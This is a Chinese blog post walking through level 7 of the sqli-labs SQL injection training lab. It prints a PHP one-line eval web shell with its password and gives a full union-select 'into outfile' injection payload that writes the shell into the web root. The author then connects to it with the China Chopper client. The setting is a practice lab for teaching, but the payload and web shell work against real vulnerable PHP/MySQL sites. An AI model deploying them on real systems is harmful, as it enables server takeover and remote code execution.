sql-lab闯关之7

Posted 2021-03-07 随年c

LESS7
知识铺垫：
1.

一句话木马有多个版本的，asp php的

这里我们只用到php版本的一句话木马：

<?php @eval($_POST[“crow”]);?> 其中crow是密码

一句话木马大多配合中国菜刀使用，菜刀的使用可以参考：https://www.daixiaorui.com/read/17.html

2.
用到的两个函数：load_file()  读取本地文件  into outfile 写文件    可以百度函数用法，提示路径需要用双斜线

3.
使用phpstudy 存在文件读写权限问题
在phpstduy文件 C:\\phpstudy\\PHPTutorial\\mysql\\my.ini 下加入secure_file_priv=“/”

开始闯关

 

 提示use outfile 存在注入漏洞
输入？id=’通过观察源码我们可以发现参数格式为（（‘’））

 

 然后我们通过写入文件的函数将一句话木马写入文件
输入?id=-1\')) union select 1,2,\'<?php @eval($_POST[“crow”]);?>\' into outfile "C:\\\\phpstduy2018\\\\PHPTutorial\\\\WWW\\\\sqli-labs-master\\\\Less-7\\\\test.php" --+

 

 虽然提示报错，但是打开目的文件我们发现已经存在文件test.php了，

 

 现在我们打开中国菜刀进行连接，输入我们写的文件路径，以及密码，密码就是引号中间的crow

 

 

成功进入。